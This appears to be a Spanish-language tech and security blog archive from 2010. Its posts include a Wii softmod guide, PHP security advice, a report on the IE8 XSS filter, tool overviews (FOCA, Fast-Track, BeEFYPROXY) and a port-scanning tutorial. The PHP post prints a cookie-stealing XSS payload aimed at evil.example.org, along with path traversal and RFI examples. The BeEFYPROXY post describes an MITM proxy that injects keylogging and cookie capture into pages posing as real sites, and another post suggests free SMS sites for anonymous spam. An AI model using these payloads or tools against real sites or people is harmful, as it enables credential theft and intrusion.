28 abr 2010

Desbloquear Nintendo Wii por Software

Liberar un Nintendo Wii para que permita ejecutar copias de seguridad (juegos que has comprado legalmente y a los que le has sacado una copia), es una tarea bastante sencilla, aun así, en muchos sitios especializados cobran por este procedimiento, entre 30 y 50 dólares, lo que me parece algo totalmente descompensado.
 Liberar Nintendo Wii por Software
En este artículo, vamos a ver como liberar nuestra consola Nintendo Wii para que permita ejecutar copias de seguridad de tus juegos y software Homebrew (hecho en casa).

¿Que necesitamos para desbloquear un Wii?

  1. Consola Nintendo Wii con firmware 4.2 (es la última versión actualmente, si tienes una anterior, puedes actualizarla con tranquilidad, no solo tendrás el ultimo software para tu Wii, sino que podrás seguir este manual)
  2. Paquete de Archivos (BannerBomb, Homebrew Channel, Wad Manager, NeoGamma, software necesario para que realices el “hackeo” de tu Wii)
  3. Memoria SD de mínimo 128 y máximo 2GB formateada en FAT16 (En teoría el formato FAT16 solo soportaría 2GB de espacio, pero existen varios tutoriales en la red para que tu Wii reciba memorias SD de hasta 4GB)
  4. Copia de Seguridad (Para que revises si quedo bien “jailbrekeado” el Wii)
  5. Conexión a Internet por Wireless *opcional (para instalar los canales de Internet, actualizar el firmware y sacarle el máximo provecho a tu consola, es necesario que tengas Internet wireless y que el Wii este configurado para acceder a esa red)

Empecemos a liberar nuestro Nintendo Wii

Lo primero que hay que hacer es formatear la memoria SD con el sistema de archivos FAT16 (en algunos sistemas operativos aparece simplemente como FAT), la conectamos al PC y simplemente se le da “click derecho > formatear“.

Una vez la memoria esta formateada, copiamos todos los archivos que se encuentran dentro del “Paquete de Archivos” a la raíz de la memoria SD , la “expulsamos de forma segura” y la conectamos a nuestra Nintendo Wii en el compartimento delantero destinado para este tipo de memorias.

Con la tarjeta dentro del Wii, abrimos el “Menú tarjeta SD”.
 Liberar Nintendo Wii por 
Software

Inmediatamente, te debe aparecer un mensaje como el siguiente:
 Liberar Nintendo Wii por 
Software
Al cual, debes hacer click en “Si” y continuar…

Te aparecerá el siguiente mensaje, donde precisamente te informan que si has pagado por ese software, has sido estafado, presionamos el botón “A” para continuar.
 Liberar Nintendo Wii por 
Software

Te aparecerá el menú del “HackMii“, que te permitirá instalar el canal “Homebrew” y la librería para reproducir tus copias de seguridad, hundimos “A” para continuar…
 Liberar Nintendo Wii por 
Software

Seleccionamos la opción “Install The Homebrew Channel“…
 Liberar Nintendo Wii por Software

Y luego instalamos la librería DVDX…
 Liberar Nintendo Wii por 
Software

Con esto ya tenemos instalado el software que necesitamos en esta parte del proceso, puedes seleccionar “Exit” para volver al Menú principal del Wii y continuar con la liberación de tu consola.

En este menú principal, encontraras un nuevo canal llamado “The homebrew channel“, desde este podrás instalar software no firmado por Nintendo, para aumentar las prestaciones de tu Wii; Ahora vamos a instalar un administrador de archivos WAD, para poder ejecutar nuestras copias de seguridad.
Seleccionamos la opción “WAD Manager” y luego en cargar…
 Liberar Nintendo Wii por 
Software

Nos aparecerá el panel del WAD Manager, que nos permitirá cargar archivos WAD arbitrariamente en nuestro Nintendo Wii.
 Liberar Nintendo Wii por Software


Seleccionamos la iOS249 y presionamos “A” para continuar…
 Liberar Nintendo Wii por Software


En este paso dejamos la emulación NAND desactivada…
 Liberar Nintendo Wii por Software


Seleccionamos el dispositivo donde se encuentra nuestro archivo WAD, en este caso se encuentra en la tarjeta SD, así que seleccionamos esa opción.
 
Liberar Nintendo Wii por Software


Automáticamente detectará el archivo “NeoGamma R7 Plus“, que es el que nos permitirá jugar desde nuestras copias de seguridad; también en el “Paquete de Archivos” se encuentra la versión R8 en español de este software, pero tendrás que ejecutarla desde el canal Homebrew, con este archivo WAD, simplemente tendrás que entrar en el canal “NeoGamma Autoboot” para correr tus copias de seguridad
 Liberar Nintendo Wii por 
Software

Ya con el NeoGamma instalado, tendrías tu Nintendo Wii Liberado, pero te voy a mostrar también como instalar el canal de “Internet“, para que navegues libremente por la red con tu Nintendo Wii.
 Liberar Nintendo Wii por 
Software

Primero entras al “Canal Tienda Wii” y das click en “Entrar a la Tienda Wii”…
 Liberar Nintendo Wii por 
Software

Dentro de la tienda, seleccionas los “Canales Wii”…
 Liberar Nintendo Wii por 
Software

y seleccionas el “Canal Internet”…
 Liberar Nintendo Wii por 
Software

haces click en el canal…
 Liberar Nintendo Wii por 
Software

Luego en el botón “Gratis”.. (anteriormente este canal era de “pago”, pero nintendo hace poco lo liberó para que todos disfrutáramos de él libremente)
 Liberar Nintendo Wii por 
Software

Seleccionamos la ubicación donde la deseamos descargar y continuamos con la instalación; si seguiste bien los pasos tendrás un nuevo canal en el menú de tu Wii llamado “Canal Internet”, desde el cual podrás navegar por la red utilizando una versión de opera, especialmente diseñada para la consola Nintendo Wii.

Y eso es todo, si llegaste a este punto, ya tienes tu Nintendo Wii liberado y listo para reproducir copias de seguridad de tus juegos favoritos, si deseas instalar más software “casero”, te recomiendo este sitio, donde podrás encontrar emuladores (para jugar Nintendo NES, Super Nintendo, Play Station, Nintendo 64, Atari, etc..) desde tu Wii, reproducir películas, y un sin fin aplicaciones que harán de tu consola todo un centro de entretenimiento multipropósitos.

Como pueden ver es un proceso bastante simple, una vez se ha identificado el software correcto para realizar el proceso, he creado el “Paquete de Archivos” para que te quede mucho mas fácil a tí, liberar tu Nintendo Wii; Espero que sea de utilidad.

26 abr 2010

Seguridad en PHP

Escribir aplicaciones PHP no es extremadamente difícil. Pero muchos olvidan los aspectos de seguridad que deben ser tenidos en cuenta al implementar estas aplicaciones.

A veces no se piensa en el daño que puede sufrir un sitio web hasta que ya es demasiado tarde.

Se debe empezar a diseñar con cabeza y no ser meros robots codificando. Veamos un poco más a fondo las posibles amenazas y recomendaciones para hacer que nuestro sitio web sea un poco más seguro.

Inyección SQL

Este ataque se produce cuando un atacante ejecuta sentencias SQL en la base de datos del sitio web, insertando en un campo del formulario sentencias SQL dentro de otra sentencia SQL haciendo que se ejecute la sentencia invasora.

Se recomienda:
  • Filtrar los datos. Por ejemplo, si tenemos en nuestro formulario el campo username, y sabemos que los usuarios sólo pueden estar compuestos por letras y números, no se deben permitir caracteres como " ' " o " = " . O si se trata del campo e-mail, podemos utilizar expresiones regulares para validarlo, como preg_match('/^.+@.+\..{2,3}$/',$_POST['email'])
  • Usar funciones que escapan caracteres especiales de una cadena para su uso en una sentencia SQL, como mysql_real_escape_string(), la cual coloca barras invertidas antes de los siguientes caracteres: \x00, \n, \r, \, ', " y \x1a. O addslashes(), (la directiva de PHP magic_quotes_gpc está activada por defecto, y básicamente ejecuta la función addslashes() en todos los datos GET, POST, y COOKIE. No se debe utilizar addslashes() en las cadenas que ya se han escapado con magic_quotes_gpc ya que se hará un doble escape).

XSS (Cross Site Scripting)


Las vulnerabilidades de XSS permiten ejecutar código de scripting en el contexto del sitio web:
  • Explotando la confianza que tiene un usuario de un sitio web. Puede que los usuarios no tengan un alto nivel de confianza en un sitio web, pero sí el navegador. Por ejemplo, cuando el navegador envía cookies en una petición.
  • Haciendo que los sitios web muestren datos externos. Como aplicaciones de mayor riesgo que incluyen foros, clientes de correo web, o contenido de RSS.
  • Cuando los datos externos no se filtran adecuadamente un atacante puede inyectar un contenido. Esto es tan peligroso como dejar que el atacante edite código en el servidor.
Un usuario que ejecute este código con JavaScript activado en su navegador será redireccionado a evil.example.org, y las cookies asociadas al sitio web serán incluidas en la consulta:
<script>document.location = 
'http://evil.example.org/steal_cookies.php?cookies=' + 
document.cookie</script>
Se recomienda:
  • Filtrar todos los datos externos. El filtrado de datos es la práctica más importante que se puede adoptar. Al validar todos los datos externos a medida que entran y salen de la aplicación se mitigarán la mayoría de las preocupaciones del XSS.
  • Utilizar las funciones que tiene PHP que ayudan al filtrado. Pueden ser útiles htmlentities () que convierte caracteres a entidades HTML, strip_tags () que elimina las etiquetas HTML y PHP de una cadena y utf8_decode ().
  • Basarse en listas blancas. Supongamos que los datos no son válidos hasta que no se pruebe que lo son. Esto implica verificar la longitud y asegurar que sólo los caracteres válidos son permitidos. Por ejemplo, si se inserta el nombre y apellidos, se debe asegurar que sólo se permiten letras y espacios. Por ejemplo Berners-Lee se consideraría nula, pero esto se puede arreglar añadiendo este nombre a la lista blanca. Es mejor rechazar datos válidos que aceptar datos maliciosos.
  • Utilizar una convención de nomenclatura estricta. Una convención de nomenclatura puede ayudar a los desarrolladores a distinguir entre datos filtrados y sin filtrar.

CSRF (Cross Site Request Forgery)

Explota la confianza que tiene un sitio web en la identidad de un usuario.

Un ejemplo sería enviar los siguientes datos en la petición:
GET  /buy.php?symbol=SCOX&amp;quantity=1000 HTTP/1.1
Host:  stocks.example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml,  image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234
Se recomienda:
  • Utilizar POST en lugar de GET en los formularios. Sobre todo cuando se esté realizando una acción que involucra una compra.
  • Utilizar $_POST en lugar de confiar en register_globals. Utilizar el método POST es inútil si se confía en register_globals y se referencian variables como $symbol o $quantity. Lo mismo sucede si se utiliza $_REQUEST.
  • Generar un token único para cada petición y verificarlo posteriormente.
Directory Transversal

Este ataque se produce cuando se especifican rutas de ficheros como "../../../../file" en los datos del formulario y mediante un script se llama a estos ficheros. Proporcionando a un atacante la posibilidad de realizar cambios en el sistema de ficheros.

Si dentro del script de PHP se incluye: require $page . '.php'; Sabiendo que esta página se almacena en /home/someone/public_html/index.php, un atacante podría hacer index.php?page=../secret accediendo a /home/someone/secret.php

Se recomienda:
  • Tener un array de páginas válidas.
  • Comprobar que el archivo solicitado coincide con un formato concreto.

RFI (Remote File Inclusion)


Como su nombre indica, se produce cuando se incluye un archivo remoto.

Por ejemplo, si existe un archivo en la ruta http://example.com/malice.php y nuestro script se encuentra en http://site.com/index.php. Un atacante puede hacer esta petición: http://site.com/index.php?page=http://example.com/malice lo que provocará que el archivo se ejecute y escriba un nuevo fichero en disco. Pudiendo ser este fichero una shell que permita la ejecución de comandos.

O por ejemplo, asignar a page el valor http://example.com/malice.php? seguido de una consulta a base de datos.

Se recomienda:
  • No confiar en los datos que no provengan de nuestro sistema.
  • Se deben validar los datos que introduce el usuario.

Seguridad en sesiones


Las sesiones y las cookies pueden ser usadas para comprometer las cuentas de los usuarios. Cuando se almacena una cookie en el ordenador esta puede ser modificada por el usuario.

Se recomienda:
  • Cambiar el identificador de la sesión a menudo. Utilizando la función session_regenerate_id() se reduce la posibilidad de que el identificador sea interceptado.
  • Usando versiones PHP5.2 o posteriores se puede denegar al Javascript del navegador el acceso a la cookie activando el flag httponly.
Esta es una pequeña muestra de recomendaciones que hará que nuestra aplicación PHP sea algo más segura.

[+] PHP Security Consortium
[+] PHP Freaks
[+] PHP Security & SQL Security. Acunetix


Fuente: http://www.securitybydefault.com/

24 abr 2010

Elive 2.0 "Topaz"



Después de más de 2 años de desarrollo ya está disponible la versión estable de Elive 2.0 "Topaz", la distribución basada en Debian que incluye un pulidísimo escritorio Enlightenment 17 (E17) y la promesa de ser finalmente adecuado para cualquier usuario nuevo a Elive o incluso a Linux. 

"Topaz" incluye el Kernel 2.6.30.9 y sus autores aseguran que ofrece un gran atractivo visual aún con recursos de hardware mínimos, textualmente: "Esta versión fué probada con 128 Mb de RAM y usa sólo el 50% de ella".
Elive 2.0 se distribuye en una sola imágen de LiveCD instalable que también puede arrancarse desde un dispositivo de almacenamiento USB; su instalador propio incluso puede actualizar instalaciones viejas. Junto con su versión especial de E17 también incluye el más antigüo E16, para estabilidad y velocidad, además de la mayoría de los programas escritos usando las Enlightenment Foundation Libraries (EFL).

En fin, una muy atractiva distribución para el escritorio que puede correr con tan poco como un CPU de 100 MHz y 64 Mb de RAM, y cuyos requerimientos mínimos recomendados son aún modestísimos: 300 MHz con 128 Mb de RAM. Tampoco requiere ningún tipo especial de tarjeta de video o aceleración 3D.
Simplemente irresistible.



Fuente: http://www.vivalinux.com.ar/

22 abr 2010

7 Herramientas de Seguridad Web Gratuitas

En alguna ocasión he leído comparaciones de estas herramientas con otras que únicamente hacen sus análisis en base a firmas, como por ejemplo Nikto o la versión gratuita de N-Stalker Esta comparación es un error, ya que el enfoque es completamente distinto. Ambas están enfocadas a detectar vulnerabilidades pero las aplicaciones basadas en patrones generalmente tienen bases de datos más amplias y actualizadas que las herramientas comprensivas y por lo tanto son complementarias.

Las características son muy similares en todas ellas, hacen una navegación previa y posteriormente lanzan el banco de pruebas. Exceptuando las dos últimas, scrawlr y acunetix,  que únicamente detectan SQL Injection y XSS respectivamente, todas las demás buscan las vulnerabilidades más comunes.

La seguridad salió mal: filtro XSS de IE8 expone sitios a ataques XSS

[Actualización: Microsoft planea liberar una actualización del filtro XSS en junio de 2010 para reparar lo que espera sea el último escenario de ataque.

El filtro de XSS (Cross-Site Scripting) que viene con el navegador Internet Explorer 8 puede ser abusado por atacantes para lanzar ataques XSS en sitios web y páginas web que de otra manea serían inmunes a esta amenaza.

Según una presentación en la conferencia Black Hat Europa de este año, el asunto introduce problemas de seguridad en varios sitios web de alto perfil, incluyendo el propio Bing de Microsoft (captura), Google, Wikipedia,org, Twitter (captura) y casi todo otro sitio web que permita a los usuarios de IE 8 crear pergiles de usuario.
Microsoft agregó la característica anti-XSS en IE 8 el pasado mes de agosto para detectar los ataques Tipo 1 (reflejados) que pueden derivar en el robo de cookie, grabación de pulsaciones de teclado, desfiguración de sitios y robo de credenciales. Sin embargo, como descubrieron los investigadores, los filtros de Microsoft funcionan escaneando las peticiones salientes en busca de una cadena que pueda ser maliciosa.

Así es donde está el problema:

Cuando tales cadenas son detectadas, IE8 generará dinámicamente una expresión regular que coincida con la cadena saliente. El navegador entonces buscará el mismo patrón en respuestas desde el servidor. Si se produce una coincidencia en cualquier parte de la respuesta del servidor entonces el navegador asume que se está llevando a cabo un ataque XSS reflejado y el navegador automáticamente alterará la respuesta de modo que el ataque XSS no tenga éxito.
El método exacto usado para alterar la respuesta del servidor es el componente crucial al prevenir los ataques XSS. Si el ataque nos neutralizado de forma apropiada, entonces el script malicioso aun podría ejecutarse. Por otro lado, también es crucial que las peticiones benignas no sean detectadas accidentalmente.
Los investigadores se las ingeniaron para usar la respuesta alterada de IE8 para realizar abusos simples y ataques XSS universales.

Este documento explica el alcance del problema y provee algunas demostraciones.

Jerry Bryant, un portavoz del equipo de respuesta de seguridad de Microsoft, dijo que el grueso de los problemas descriptos en el documento fueron solucionados con el parche de seguridad MS10-002, que fue publicado para los usuarios de IE a comienzos de este año.

"Microsoft también agregó un cambio de defensa en profundidad (MS10-018) en marzo de 2010 para proveer de una más amplia cobertura de este tipo de escenarios de ataque," dijo Bryant.

Sin embargo no todos los problemas han sido reparados y el filtro XSS del navegador sigue introduciendo riesgos de seguridad en ciertos sitios web.

Hasta que sea reparado apropiadamente, los investigadores recomiendan seguir las siguientes mitigaciones en el lado del servidor:
  • Filtrar todo el contenido generado por usuarios de modo que, aún si es interpretado en un contexto diferente, no pueda ejecutarse.
  • Usar tokens anti-CSRF del sistema para impedir que cualquier clase de XSS pueda ser explotado en primer lugar.
  • Deshabilitar los filtros de IE8 usando un encabezado de respuesta con el mecanismo de opt-out. Hay pros y contras obvios al hacer esto, de modo que considere sus opciones cuidadosamente. Más allá de las serias vulnerabilidades tratadas en este documento, los filtros ayudan en gran medida a proteger a los usuarios de IE8 de los ataques XSS tradicionales. Obviamente, una vez que los usuarios han actualizado a la versión emparchada, recomendamos fuertemente mantener habilitados los filtros.
Los usuarios finales que corren IE8 deben considerar deshabilitar los filtros desde dentro del navegador hasta que se despache un parche completo.

ACTUALIZACIÓN: Bryant de Microsoft envió un correo para señalar artículo del blog de agosto de 2008 que brinda información de contexto adicional sobre este asunto.

Traducción: Raúl Batista - Segu-Info
Autor: Ryan Naraine
Fuente: Blogs ZDNet

[FOCA] Herramienta para análisis de Meta Datos

7zTFy FOCA   Herramienta para 
análisis de Meta Datos

¿Que es la FOCA?

FOCA (Llamado así en honor a Francisco OCA, aunque luego buscaran las siglas “Fingerprinting Organizations with Collected Archives”) es una herramienta para encontrar Metadatos e información oculta en documentos de Microsoft Office, Open Office y documentos PDF/PS/EPS, extraer todos los datos de ellos exprimiendo los ficheros al máximo y una vez extraídos cruzar toda esta información para obtener datos relevantes de una empresa.

¿Que funciones tiene la FOCA?

La foca hace Google y Bing Hacking para descubrir los archivos ofimáticos que tiene un dominio, los descarga masivamente, les extrae los metadatos, organiza los datos y nos muestra la siguiente información:
  • Nombres de usuarios del sistema
  • Rutas de archivos
  • Versión del Software utilizado
  • Correos electrónicos encontrados
  • Fechas de Creación, Modificación e Impresión de los documentos.
  • Sistema operativo desde donde crearon el documento
  • Nombre de las impresoras utilizadas
  • Permite descubrir subdominios y mapear la red de la organización
  • Nombres e IPs descubiertos en Metadatos
  • Búsqueda de nombres de dominio en Web: Google o Bing [Interfaz web o API]
  • Búsqueda de registros Well-Known en servidor DNS
  • Búsqueda de nombres comunes en servidor DNS
  • Búsqueda de IPs con resolución DNS
  • Búsqueda de nombres de dominio con BingSearch ip
  • Búsqueda de nombres con PTR Scanning del segmento de red con DNS interno
  • Transferencia de Zonas
  • Entre otras muchas cosas…
c7y5V FOCA   Herramienta para 
análisis de Meta Datos
La foca es especialmente útil, en la tarea previa a un pen-test, donde debemos recolectar toda la información posible sobre el objetivo para que nuestra tarea se realice de la mejor forma.

Descargar la FOCA

Mas Información:
Pagina Oficial de la FOCA
Versión Online de la FOCA
La Pagina del Maligno, donde habla siempre de su FOCA

Fuente: http://www.dragonjar.org/

TOP 10 Fallos de Seguridad en Aplicaciones Web

El proyecto OWASP (Open Web Application Security Project) ha publicado la actualización al año 2010 de su famoso TOP 10 con los mayores riesgos asociados a las aplicaciones web.
4Oc8p TOP 10 Fallos 
de Seguridad en Aplicaciones Web
En esta nueva edición del TOP 10 se nota como intencionalmente han querido eliminar de la listas algunas vulnerabilidades específicas, para enfocarse más en los riesgos de seguridad que representan estas vulnerabilidades. Este nuevo enfoque sobre riesgos de seguridad en las aplicaciones web tienen por objeto impulsar a las organizaciones, a madurar más la comprensión y gestión de aplicaciones de seguridad a través de su organización.

La OWASP indica que el Top 10 para el 2010 es:

  1. Inyección
  2. Cross-Site Scripting (XSS)
  3. Interrupción de la autenticación y administración de sesiones
  4. Referencias de Objetos Directos Inseguros
  5. Falsificación de Solicitud Cross-Site (CSRF)
  6. La configuración errónea de Seguridad
  7. Cifrado de Almacenamiento Inseguro
  8. Falla al restringir el acceso URL
  9. Insuficiente protección de la capa de transporte
  10. Redirecciones sin validar y hacia adelante.
Más Información:
Anuncio en la Página Oficial de OWASP

Fuente: http://www.dragonjar.org/

Enviar SMSs Gratis a donde quieras

Bueno... a propósito del SMS Spoofing que puse el otro día... Hoy traigo web que sirven para enviar SMSs gratis, pero sin suplantar a nadie (buuuu).

Igualmente sirven para lo que se te ocurra, como para enviar mensajes "anónimos" ya que los mensajes llegan con números randoms, para jugar bromas, para spamear, etc...

El método de envió es igual al del tutorial SMS Spoofing (se escribe el + con el código internacional...) y no necesitas registrarte.

Web de envío de SMS Gratis:
Bueno... si tienen más posteenlos aquí y yo los agrego...

P.D: Los mensajes se demoran como 1 minuto en llegar.

[+] Salu2
[+] ZioneR

21 abr 2010

Ya puedes pedir que te envíen Ubuntu 10.04


Para los amantes de Ubuntu, ya podéis correr a pedir vuestros CDs de Ubuntu 10.04 LTS.

Lógicamente, la producción de los CDs físicos y su envío suponen costes enormes para Canonical. Muchas veces esos CDs simplemente terminan en los cajones de los usuarios que los piden por afán de coleccionismo puro y duro sin darles uso real. Por ello Canonical ha establecido un sistema por el que detectará si se te han enviado versiones anteriores, y en tal caso te sugerirán queactualices tu actual sistema, lo descarges o contribuyas con una donación. Algo lógico, ya que hay usuarios que abusan del “todo gratis”.

Os recuerdo que dicha versión de Ubuntu todavía se encuentra en beta 2, por lo que los CDs no serán enviados hasta que la versión definitiva esté completamente terminada.


Fuente: http://www.dosbit.com/

17 abr 2010

[Fast-Track] Video Accediendo a un sistemas con Fast-Track

Bueno... he aquí un video de uso básico de la gran herramienta Fast-Track, excelente para introducirse al uso de Fast-Track.



cd /pentest/exploits/fasttrack
sudo ./fast-track.py -g


[+] Salu2
[+] ZioneR

16 abr 2010

[BeEFYPROXY] Interceptar el trafico WEB (MITM)



BeEFYPROXY es la unión de dos scripts que juntos permiten interceptar y re-enviar contenido modificado de sitios verdaderos aparentando ser el sitio original. Se requiere de apuntar los dominios al IP donde esta hosteado BeEFYPROXY.BeEFYPROXY esta diseñado para correr en un hosting dedicado para que la dirección IP muestre la pagina default de BeEFYPROXY.Se recibe una conexión a la dirección IP y el script toma el valor de la cabecera Host y obtiene la pagina del Host verdadero y agrega el script del cliente BeEF.

Instalación
  • Descomprime el contenido de beefproxy en /
  • Apunta cualquier dominio a la IP donde esta hosteado BeEFYPROXY y este se conecta al Host indicado, obtiene la pagina real, le agrega el script de BeEF y muestra el contenido al usuario como si fuera la pagina del dominio verdadero.
Funciones
  1. MITM con modificación de contenido
  2. Redirige el contenido actual del dominio verdadero
  3. Agrega el Framework BeEF (accesible en /beef.php) que incluye:
    • Keylog en tiempo real
    • Almacena Cookies, Keylog y HTML en /cache (ver por ftp)
    • muchas mas funciones (ver http://www.bindshell.net/tools/beef)
 Como esta hecho?

Junte BeEF (http://www.bindshell.net/tools/beef) y PHProxy (http://sourceforge.net/projects/poxy) en un solo archivo. Cambie de nombre el index.php de BeEF por beef.php y puse el index.php de PHProxy modificado.En PHProxy cambie la variable $_url_form (ln 1142) que era la barra de navegación del proxy por el url default del script de BeEF: /hook/beefmagic.js.php y le modifique su label al principio del archivo.Tambien agrege en la ln 417 una función para que cuando se recibe una petición sin variable 'q' por GET, se tome como url default el Host con el que se hace la petición.
Descargar BeEFYPROXY

Web oficial: http://www.hakim.ws/software/beefyproxy/
Más Info: http://www.bindshell.net/tools/beef

[+] ZioneR

Rastreo y penetración de sistemas con Nmap y hping2

Bueno en este documento consiste en identificar que servicios está  ejecutando el sistema  del servidor(destino, víctima o como lo llamen) , trataremos de  de manera introducción sobre las técnicas conocidas de escaneo de puertos que son necesarias para descubrir su estado: abiertos, cerrados, filtrados. En éste último caso trataremos de averiguar las reglas de filtrado que el cortafuegos está aplicando.

Las herramientas como Nmap y hping2 pueden automatizar el escaneo pero no son 100% fiables. Siempre debemos interpretar los resultados devueltos por los programas. Por esta razón debemos conocer en profundidad el proceso llevado a cabo en cada una de las técnicas empledas.

Las técnicas de escaneo pueden dividirse en dos grupos: Open scanning (escaneo abierto), Halfopen scanning (escaneo a medio abrir) y Stealth scanning (escaneo sigiloso). Esta división se hace en función del grado de conexión realizada contra la máquina destino y en función de las
características de los paquetes enviados. Conocer qué técnica es la más adecuada depende de la topología de la red, de si existe o no un IDS detrás, del grado de “logueo” del sistema.

El empleo de un escaneo de tipo Open scanning nos proporciona un nivel de fiabilidad muy levado y conveniente, pero hay que tener en cuenta que los logs dejados son altos y harían saltar a cualquier sistema IDS y el escaneo sería conocido. Por otra parte, si usamos Stealth scanning, podremos evitar determonados sistemas IDS y sobrepasar ciertas reglas de cortafuegos. Sin embargo, un inconveniente de esta técnica es que determinadas circunstancias, suele proveer de falsos positivos, por lo que deberemos saber cómo interpretar los resultados.

Full TCP Connection

Si deseamos una fiabilidad del 100% en los resultados devueltos, ésta es la técnica que debemos aprovechar, siempre teniendo en mente que es la que más rastros deja en el log del sistema remoto y la más sencilla de filtrar. Si no nos importa que nos detecten, ya sea porque se trata de un sistema al que estemos haciendo una auditoría, porque es un equipo de nuestra propiedad o cualquier otra razón, ésta técnica es la más efectiva y rápida.
Figura N°1 Full TCP Connection: Puerto Abierto
La técnica del Full TCP Connection implica abrir una conexión completa con el equipo remoto con el modo de conexión normal, conocido como three-way TCP/IP handshake29. En la figura 1 podemos ver el proceso llevado a cabo para crear y establecer la conexión. Se hace uso de los siguientes flags para crear y establecer la conexión: SYN, SYN/ACK, ACK.

Inicialmente la máquina origen (cliente) envía un paquete con el flag SYN activado a la máquina destino (servidor). El servidor responde con los flags SYN/ACK activados, lo que indica que el puerto al que nos hemos intentado conectar se encuentra abierto. Después de que el cliente envía el ACK de confirmación, se completa el Three-way TCP/IP handshake y la conexión es terminada por el cliente, volviendo a realizar el mismo proceso para el resto de los puertos que deseemos escanear.

En la figura dos podemos apreciar lo que sucedería si el puerto del servidor se encontrara cerrado.
Figura N°2 Full TCP Connection: Puerto Cerrado
 Aquí, el servidor devuelve un RST/ACK. El servidor informa al cliente que debe terminar la conexión debido a que el puerto se encuentra cerrado. Ésta técnica es muy fácil de identificar, ya que al realizar una conexión completa, los logs del sistema y un IDS lo detectarían. Una vez detectado, un cortafuegos bloquearía el resto de las peticiones.

Half Open Scan Method

Éste método se llama Half open porque el cliente termina la conexión antes de que se haya completado el proceso de intercambio Three-way TCP/IP Handshake, por lo que pasará inadvertido a los IDS basados en conexión, aunque es muy probable que devuelva falsos positivos.
Figura N°3 Half Open Scan Method
SYN Scanning

Ésta técnica es exactamente igual al Full TCP conection, excepto que en el último paso el envío del ACK por parte de la máquina cliente no se lleva a cabo y en su lugar, el cliente termina la conexión mediante el envío de un RST. En realidad, es el sistema operativo quien se toma la tarea de enviar el RST. En la figura tres se esquematiza este tipo de escaneo.

Si en respuesta a nuestro SYN el servidor envía un SYN/ACK, nos está informando que el puerto está abierto. Si lo que envía es un RST/ACK, significa que el puerto está cerrado. Ésta técnica es muy fácil de identificar por un IDS, ya sea el Snort, TCPWrappers o IPLog. El hecho de que éste método haya sido utilizado para generar DoS (denial of service – Denegación de servicios que veremos más adelante en este documento) SYN Flood es un inconveniente ya que provocó que muchos cortafuegos tengan reglas específicas para prevenir este tipo de escaneos. Mediante ésta técnica podemos realizar rápidos escaneos que puedan pasar inadvertidos a los IDS débiles, pero la desventaja es que debe ser ejecutado con privilegios de administrador.

Stealth Scanning

Ésta técnica se denominó así debido a que permitía evitar los sistemas de detección y logeo de los IDS. Hoy día, este tipo de escaneo tiene que ver con algunas de las técnicas siguientes: uso de determinados flags, técnicas de sobrepasar filtros, cortafuegos, routers, casual network traffic, etc.

SYN/ACK Scanning

Ésta técnica tiene la característica de eliminar la primera parte del Three-way TCP/IP Handshake. Se envía el SYN/ACK y en función de la respuesta podremos saber el estado en que se encuentra el puerto. El servidor termina la conexión pensando que se ha producido algún tipo de fallo en las transacciones con este puerto, en el que no se ha producido un SYN previo.

En el caso de que el puerto se encontrase abierto, no recibiríamos ninguna respuesta por parte del servidor. Hay que saber leer con detenimiento este resultado, porque los falsos positivos en este tipo de escaneo son muy probables. La ausencia de respuesta puede deberse a algún tipo de filtrado, por ejemplo, de un cortafuegos de tipo stateless.

FIN Scanning

Desafortunadamente esta técnica se aprovecha de una mala implementación del código de los BSD, que han usado muchos sistemas operativos para construir su pila TCP/IP. En teoría, cuando se envía un paquete con el flag FIN activo, un puerto cerrado responderá con un RST, mientras que los puertos abiertos se quedarán “callados” (RFC 793, pp64). Véase la figura 4.
Figura N°4 FIN Scanning
 En éste caso hay que mencionar que los sistemas de Microsoft han decidido ignorar completamente los estándares e implementar lo que a ellos les ha parecido mejor. De modo que ésta técnica, junto con XMAS scanning y Null scanning no son válidas para sistemas ejecutando Win95/NT.

Por otra parte podemos aprovechar esta característica para identificar si el sistema se trata de un Windows. Si mediante ésta técnica encontramos puertos abiertos, sabremos que no se trata de un sistema Windows, pero si no encontramos ningún puerto abierto y por medio de un SYN scanning sí encontramos puertos abiertos, entonces sabremos que se trata de un sistema Windows. Existen otros sistemas que responden con un RST cuando el puerto está abierto, en vez de desechar el paquete (que es lo que el estándar dispone que debe hacerse). Algunos de estos sistemas son Cisco, Solaris, BSDI, MVS e IRIX.

Ésta técnica también nos devuelve falsos positivos por lo que debemos interpretar los resultados.
Cualquier sistema de filtrado puede estar bloqueando los RST de los puertos cerrados. Como resultado obtendríamos un escaneo erróneo y deberemos aplicar otras técnicas o bien, comparar los resultados obtenidos mediante esta técnica con los que obtenemos con otras diferentes como los escaneos SYN o SYN/ACK.

ACK Scanning

Éste método, utilizando el programa Nmap con la opción -sA, se usa generalmente para poder averiguar las reglas de filtrado de los cortafuegos. Concretamente nos permite indagar si el cortafuegos es stateful o sencillamente un sistema de filtrado simple que bloquea los paquetes SYN entrantes.

En ésta técnica enviamos un paquete ACK con un ID de secuencia aleatoria al puerto especificado. Cuando recibimos paquetes con flags RST activados los puertos son clasificados como “no filtrados”, mientras que si no recibimos ninguna respuesta o se nos envía un ICMP Unreachable, se clasificarán los puertos como “filtrados”. Una característica del Nmap y de este tipo de filtrado reside en que los puertos que deberían aparecer como “no filtrados” no aparecen. Sólo obtendremos aquellos puertos que que hemos detectado como “filtrados”. Otra técnica empleando el envío de ACK fue descrita utilizando un bug30 (error en software o hardware) que existía en la capa IP de los sistemas operativos. Mediante el envío de ACK, teníamos dos técnicas para detectar el estado de los puertos atacados. El primer método implica evaluar el campo TTL (Time To Live) del paquete, mientras que en el segundo debemos analizar el campo WINDOW de éste. En ambos es imperativo analizar los paquetes que recibamos con el flag RST activado.

En el primer caso, un análisis de la cabecera IP de los paquetes, para determinados sistemas operativos, nos descubre que el valor de TTL de los paquetes que nos retorna un puerto abierto es menor que el del TTL que se obtiene como respuesta de puertos cerrados.

Esto se explica mejor con el ejemplo siguiente:
Packet 1: host XXX.XXX.XXX.XXX port 20:F:RST -> ttl: 70 win:0 => closed
Packet 2: host XXX.XXX.XXX.XXX port 21:F:RST -> ttl: 70 win:0 => closed
Packet 3: host XXX.XXX.XXX.XXX port 22:F:RST -> ttl: 40 win:0 => open
Packet 4: host XXX.XXX.XXX.XXX port 23:F:RST -> ttl: 70 win:0 => closed

Vemos en el paquete de respuesta del puerto 22, el valor TTL es menor que en los puertos que se hallan cerrados.

